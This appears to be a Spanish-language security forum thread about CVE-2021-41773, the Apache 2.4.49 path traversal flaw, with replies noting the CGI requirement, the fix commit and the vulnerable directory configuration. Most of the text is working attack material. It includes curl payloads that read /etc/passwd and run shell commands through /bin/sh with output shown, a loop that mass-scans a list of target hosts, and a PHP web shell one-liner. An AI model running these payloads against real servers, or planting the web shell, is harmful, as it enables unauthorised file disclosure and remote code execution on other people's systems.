CVE-2021-41773 POC
La vulnerabilidad sólo funciona con Apache HTTP 2.4.49
Y según Shodan: hay 112,755 Apache Server 2.4.49
Citar127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Citarcat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
Citarcurl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
<?php echo system($_GET['c']); ?>
Local file disclosure
Citar$ curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
Remote Code Execution
Citar$ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"
Bug
https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
root@x:~# curl --silent --path-as-is --insecure "127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
Creo que no es replicable en ciertas circunstancias, talves deba tener habilitado cgi para eso.
Si, necesita CGI enabled: https://github.com/blasty/CVE-2021-41773 (https://github.com/blasty/CVE-2021-41773)
EDIT:
RCE: https://twitter.com/wdormann/status/1445676921581228038 (https://twitter.com/wdormann/status/1445676921581228038)
Saludos!
WHK, la vulnerabilidad sólo funciona con Apache HTTP 2.4.49, ninguna otra versión anterior.
módulo habilitado mod_cgi --> permite además RCE
MCKSys Argentina y funciona también para Windows como comenta Will Dormann en twitter
https://twitter.com/wdormann/status/1445573881121546245
Relacionado: https://twitter.com/wdormann/status/1445676921581228038
Script NSE para escáner nmap de la vulnerabilidad servidor web Apache 2.4.49
- CVE-2021-41773
https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse
Apache 2.4.49 (CVE-2021-41773) y 2.4.50 (CVE-2021-42013)
(https://pbs.twimg.com/media/FBM6yfQXoAcVtoX?format=jpg&name=small)
- vulnerable:
<Directory />
Require all granted
</Directory>
- NOT vulnerable (** DEFAULT **)
<Directory />
Require all denied
</Directory>